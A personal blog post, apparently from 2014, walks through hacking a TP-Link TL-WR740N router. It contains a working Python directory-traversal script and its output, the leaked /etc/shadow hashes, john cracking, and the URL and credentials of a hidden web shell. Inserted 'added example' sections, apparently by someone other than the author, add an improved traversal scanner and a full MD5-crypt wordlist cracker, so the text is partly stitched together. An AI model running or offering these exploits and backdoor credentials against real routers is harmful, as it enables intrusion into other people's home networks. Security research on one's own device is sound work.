Hacking into TP-Link (TL-WR740N)

I have a TL-WR740N router (an old one) whose firmware I was trying to gain access to. I thought it was OpenWrt, but nmap reports it as a TP-Link WAP, so I don't know (yet)! I scanned its ports hoping to find an open Telnet or SSH port (the ZTE router has its Telnet port open, by the way!!!), but there isn't one. Here is my initial scan:

# nmap -sT 192.168.0.1
Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-19 00:38 EEST
Nmap scan report for 192.168.0.1 (192.168.0.1)
Host is up (0.0028s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE
80/tcp   open  http
1900/tcp open  upnp
MAC Address: 00:27:19:FD:4E:2A (Tp-link Technologies CO.)

Nmap done: 1 IP address (1 host up) scanned in 0.59 seconds

So … I went to test the graphical interface (the router's web interface at http://192.168.0.1/); here is how the page looks:

[screenshot TPLINK00: the router's web interface]

A little about the interface: I checked the source code and found that the page uses frameset/frame tags to load the site content.

<FRAMESET cols=160,55%,*>
<FRAMESET rows=72,* frameSpacing=0 frameBorder=0>
<FRAME name=productphoto marginWidth=0 marginHeight=0 src="/images/productphoto.gif" noResize scrolling=no>
<FRAME name=bottomLeftFrame marginWidth=0 marginHeight=0 src="/userRpm/MenuRpm.htm" noResize>
</FRAMESET>
<FRAME name=mainFrame marginWidth=0 marginHeight=0 src="/userRpm/StatusRpm.htm" frameBorder=0>
<FRAME name=helpFrame marginWidth=0 marginHeight=0 src="/help/StatusHelpRpm.htm" frameBorder=1>
</FRAMESET>

I made a list of the available directories/paths:

So now I had to check for a directory traversal vulnerability (and I found one).

I didn't know how many directories I needed to go back to reach /etc/shadow (or /etc/passwd), so I would have to test (with the HackBar plugin, maybe) payloads like this: http://192.168.0.1/images/../../../etc/shadow.

Something to note here: urllib, which I used to download the HTML pages, raises the error "IOError: ('http protocol error', 0, 'got a bad status line', None)" and exits if the target URL is not … an HTML file (I think). I don't really care about this, as I personally don't use urllib anymore (I switched to mechanize a while ago), but anyway, this is just a note!

My full script:

# Python 2 script: urllib.urlopen() prompts for HTTP Basic credentials on a 401
import urllib
import time

depth = 5                 # range(1, depth) tries 1..4 levels of ../
host = 'http://192.168.0.1/'
path = '../'
target = 'etc/shadow'

htmltext = ''             # keeps the last body fetched, handy with python -i
fullpath = ''

directories = ['', 'frames/', 'images/', 'help/']

for i in range(1, depth):
        fullpath += path
        for directory in directories:
                url = host + directory + fullpath + target
                print "Testing: ", url
                try:
                        htmltext = urllib.urlopen(url).read()
                except IOError:
                        # 'http protocol error ... got a bad status line' for non-HTML targets;
                        # skip the check so the previous URL's body is not reported again
                        continue
                if "root" in htmltext:
                        print url, " is vulnerable"
                else:
                        time.sleep(2)

The program (more precisely urllib) will prompt for a username and password; the default credentials for the TL-WR740N router are admin/admin.

The output:

Testing:  http://192.168.0.1/../etc/shadow
Testing:  http://192.168.0.1/frames/../etc/shadow
Enter username for TP-LINK Wireless Lite N Router WR740N at 192.168.0.1: admin
Enter password for admin in TP-LINK Wireless Lite N Router WR740N at 192.168.0.1:
Testing:  http://192.168.0.1/images/../etc/shadow
Testing:  http://192.168.0.1/help/../etc/shadow
Testing:  http://192.168.0.1/../../etc/shadow
Testing:  http://192.168.0.1/frames/../../etc/shadow
http://192.168.0.1/frames/../../etc/shadow  is vulnerable
Testing:  http://192.168.0.1/images/../../etc/shadow
http://192.168.0.1/images/../../etc/shadow  is vulnerable
Testing:  http://192.168.0.1/help/../../etc/shadow
http://192.168.0.1/help/../../etc/shadow  is vulnerable

So … if you run this script with the -i option (python -i), you end up in interactive mode once it finishes (good for debugging), so I checked the value of htmltext, and what do you know:

>>> print htmltext
TL-WR740N

//
root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
bin::10933:0:99999:7:::
daemon::10933:0:99999:7:::
adm::10933:0:99999:7:::
lp:*:10933:0:99999:7:::
sync:*:10933:0:99999:7:::
shutdown:*:10933:0:99999:7:::
halt:*:10933:0:99999:7:::
uucp:*:10933:0:99999:7:::
operator:*:10933:0:99999:7:::
nobody::10933:0:99999:7:::
ap71::10933:0:99999:7:::

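As an added example (my code, not the post's script), here is a Python 3 version of the same probe that fixes two weaknesses in the loop above: a failed fetch must not be judged on the previous URL's buffer, and a bare "root" substring will fire on any HTML page that happens to mention root. The transport is a callable so the scan can be exercised offline against responses modelled on the output above; the real transport assumes HTTP Basic auth with the admin/admin default, and the fake router, its decoy page and the set of paths that leak are constructed for the demo.

```python
import base64
import http.client
import re
import urllib.error
import urllib.request

# One shadow(5) record: name, password field, then seven numeric-or-empty fields.
SHADOW_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_-]*:[^:\n]*(?::\d*){7}$", re.M)


def looks_like_shadow(body):
    """True only when the body holds a real shadow record, not merely the word 'root'."""
    return SHADOW_LINE.search(body) is not None


def candidate_urls(host, directories, target, max_depth):
    """Every <dir> + '../' * n + <target> combination, shallowest first (the post's order)."""
    urls = []
    for depth in range(1, max_depth + 1):
        for directory in directories:
            urls.append(host + directory + "../" * depth + target)
    return urls


def http_fetch(url, username="admin", password="admin", timeout=5):
    """Real transport: GET with HTTP Basic credentials (assumed WR740N default admin/admin)."""
    token = base64.b64encode(("%s:%s" % (username, password)).encode()).decode()
    req = urllib.request.Request(url, headers={"Authorization": "Basic " + token})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("latin-1")


def scan(host, directories, target, max_depth, fetch=http_fetch):
    """Return the URLs whose own response carries shadow records.

    Each URL is judged on the body it returned; a failed fetch never inherits
    the previous URL's buffer.
    """
    hits = []
    for url in candidate_urls(host, directories, target, max_depth):
        try:
            body = fetch(url)
        except (urllib.error.URLError, http.client.HTTPException, OSError, ValueError):
            continue  # bad status line, connection refused, HTTP 4xx/5xx ...
        if looks_like_shadow(body):
            hits.append(url)
    return hits


# Constructed stand-in for the router, modelled on the post's output: the file
# comes back wrapped in an HTML page titled TL-WR740N, and only a two-level
# traversal from a real sub-directory reaches the filesystem root.
HOST = "http://192.168.0.1/"
SHADOW_BODY = (
    "<html><title>TL-WR740N</title>\n//\n"
    "root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::\n"
    "bin::10933:0:99999:7:::\n"
)
DECOY_BODY = "<html><title>TL-WR740N</title><body>Login as root required</body></html>"
LEAKING_PATHS = {"frames/../../etc/shadow", "images/../../etc/shadow", "help/../../etc/shadow"}


def fake_fetch(url):
    path = url[len(HOST):]
    if path in LEAKING_PATHS:
        return SHADOW_BODY
    if path.count("../") == 1:
        return DECOY_BODY  # contains "root" but is not the file: a substring check would mis-flag it
    raise http.client.BadStatusLine("")  # what urllib reported as 'got a bad status line'


if __name__ == "__main__":
    dirs = ["", "frames/", "images/", "help/"]
    for hit in scan(HOST, dirs, "etc/shadow", 4, fetch=fake_fetch):
        print(hit, "is vulnerable")
```

Against a real device, call scan() without the fetch argument; the regex accepts any complete shadow(5) record, so the same detector works for /etc/passwd-style leaks if you loosen the seven trailing fields.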
Not bad so far! So now what?

I copied the line with the root account into a file named root.password and ran john on it:

john --show root.password

I got the password: it is 5up (the default password, I guess).
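
As an added example, not the post's own tooling, here is the check john performed written out in Python: the shadow dump above is parsed, each account is classified (an empty second field means the account needs no password at all, a leading * means it is locked), and the two MD5-crypt hashes are attacked with a wordlist using a re-implementation of the $1$ scheme (assumed to match crypt(3) bit for bit). The wordlist and the classification rules are mine; the shadow lines are the ones printed above.

```python
import hashlib

# /etc/shadow exactly as the router returned it (copied from the post)
SHADOW = """\
root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
bin::10933:0:99999:7:::
daemon::10933:0:99999:7:::
adm::10933:0:99999:7:::
lp:*:10933:0:99999:7:::
sync:*:10933:0:99999:7:::
shutdown:*:10933:0:99999:7:::
halt:*:10933:0:99999:7:::
uucp:*:10933:0:99999:7:::
operator:*:10933:0:99999:7:::
nobody::10933:0:99999:7:::
ap71::10933:0:99999:7:::
"""

# Constructed wordlist for the demo; john would use its default list or rockyou
WORDLIST = ["admin", "password", "root", "1234", "5up", "tplink"]

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def to64(value, count):
    """MD5-crypt's little-endian base64 variant."""
    out = ""
    for _ in range(count):
        out += ITOA64[value & 0x3F]
        value >>= 6
    return out


def md5crypt(password, salt):
    """FreeBSD/glibc MD5-crypt ($1$), the scheme the router's hashes use (re-implemented here)."""
    pw = password.encode()
    s = salt.encode()[:8]
    ctx = hashlib.md5(pw + b"$1$" + s)
    alt = hashlib.md5(pw + s + pw).digest()
    for remaining in range(len(pw), 0, -16):
        ctx.update(alt[:min(remaining, 16)])
    bits = len(pw)
    while bits:
        ctx.update(b"\0" if bits & 1 else pw[:1])
        bits >>= 1
    final = ctx.digest()
    for i in range(1000):  # the deliberately slow stretching loop
        c = hashlib.md5()
        c.update(pw if i & 1 else final)
        if i % 3:
            c.update(s)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()
    order = [(0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)]
    encoded = "".join(to64((final[a] << 16) | (final[b] << 8) | final[c], 4) for a, b, c in order)
    encoded += to64(final[11], 2)
    return "$1$" + s.decode() + "$" + encoded


def parse_shadow(text):
    """Map account name -> password field (second column of shadow(5))."""
    accounts = {}
    for line in text.splitlines():
        if ":" in line:
            name, field = line.split(":", 2)[:2]
            accounts[name] = field
    return accounts


def classify(accounts):
    """Split accounts into locked (* or !), passwordless (empty field) and hashed."""
    locked, empty, hashed = [], [], {}
    for name, field in accounts.items():
        if field == "":
            empty.append(name)       # no password needed to log in as this user
        elif field.startswith(("*", "!")):
            locked.append(name)
        else:
            hashed[name] = field
    return locked, empty, hashed


def crack(hashed, wordlist):
    """Dictionary attack: recompute MD5-crypt with each hash's own salt and compare."""
    found = {}
    for name, digest in hashed.items():
        if not digest.startswith("$1$"):
            continue
        salt = digest.split("$")[2]  # "$1$$..." gives an empty salt
        for word in wordlist:
            if md5crypt(word, salt) == digest:
                found[name] = word
                break
    return found


if __name__ == "__main__":
    locked, empty, hashed = classify(parse_shadow(SHADOW))
    print("no password set:", ", ".join(empty))
    for name, word in crack(hashed, WORDLIST).items():
        print("%s: %s" % (name, word))
```

Two things the dump shows that john alone does not: root and Admin carry an identical hash, and since the salt is empty ($1$$) identical hashes mean identical passwords; and bin, daemon, adm, nobody and ap71 have an empty password field, so they need no password at all. Note also that john --show only prints entries already in john.pot; a fresh crack is started with john root.password.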

Anyway… now what? (This is REALLY interesting.)

Well… I did my research, and this is what I found:

Some TP-Link routers have a hidden web shell that you can access at this URL:
http://192.168.0.1/userRpmNatDebugRpm26525557/linux_cmdline.html

The username is osteam and the password is 5up; here is how this interface looks:

[screenshot TPLINK01: the hidden linux_cmdline.html web shell]

And there is actually an nmap script to test for this vulnerability in TP-Link routers:

nmap -p80 --script http-tplink-dir-traversal -Pn -n 192.168.0.1

Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-19 02:33 EEST
Nmap scan report for 192.168.0.1
Host is up (0.00016s latency).
PORT   STATE SERVICE
80/tcp open  http
| http-tplink-dir-traversal:
|   VULNERABLE:
|   Path traversal vulnerability in several TP-Link wireless routers
|     State: VULNERABLE (Exploitable)
|     Description:
|       Some TP-Link wireless routers are vulnerable to a path traversal vulnerability that allows attackers to read configurations or any other file in the device.
|       This vulnerability can be exploited without authenticatication.
|       Confirmed vulnerable models: WR740N, WR740ND, WR2543ND
|       Possibly vulnerable (Based on the same firmware): WR743ND,WR842ND,WA-901ND,WR941N,WR941ND,WR1043ND,MR3220,MR3020,WR841N.
|     Disclosure date: 2012-06-18
|     Extra information:
|       /etc/shadow :
|
|   root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
|   Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
|   bin::10933:0:99999:7:::
|   daemon::10933:0:99999:7:::
|   adm::10933:0:99999:7:::
|   lp:*:10933:0:99999:7:::
|   sync:*:10933:0:99999:7:::
|   shutdown:*:10933:0:99999:7:::
|   halt:*:10933:0:99999:7:::
|   uucp:*:10933:0:99999:7:::
|   operator:*:10933:0:99999:7:::
|   nobody::10933:0:99999:7:::
|   ap71::10933:0:99999:7:::
|
|     References:
|_      http://websec.ca/advisories/view/path-traversal-vulnerability-tplink-wdr740
MAC Address: 00:27:19:FD:4E:2A (Tp-link Technologies CO.)

Nmap done: 1 IP address (1 host up) scanned in 0.55 seconds

By the way… I mirrored the website using webhttrack (httrack) but didn't get anything interesting; using the web shell, though, I went to the web directory and there is a folder named "userRpm" where I found lots of interesting files. I am still digging into this router (I want to see if I can upload a file or add new commands, maybe!)

Anyway…

Conclusion

TL-WR740N routers are common where I live (and in Mexico as well), and they are not secure. In fact, you should be careful with the router you are using: double-check it and test it for security.

[note]: this is a VERY interesting video about hacking routers (I applied that method to a ZTE router and got great results)

Thanks


9 thoughts on "Hacking into TP-Link (TL-WR740N)"

  1. Hi, Legeti. Has this issue been fixed, or is it still possible to hack the TL-WR740N router? I use the same TL-WR740N router, and the firmware version is: 3.16.9 Build 141113 Rel.61554n

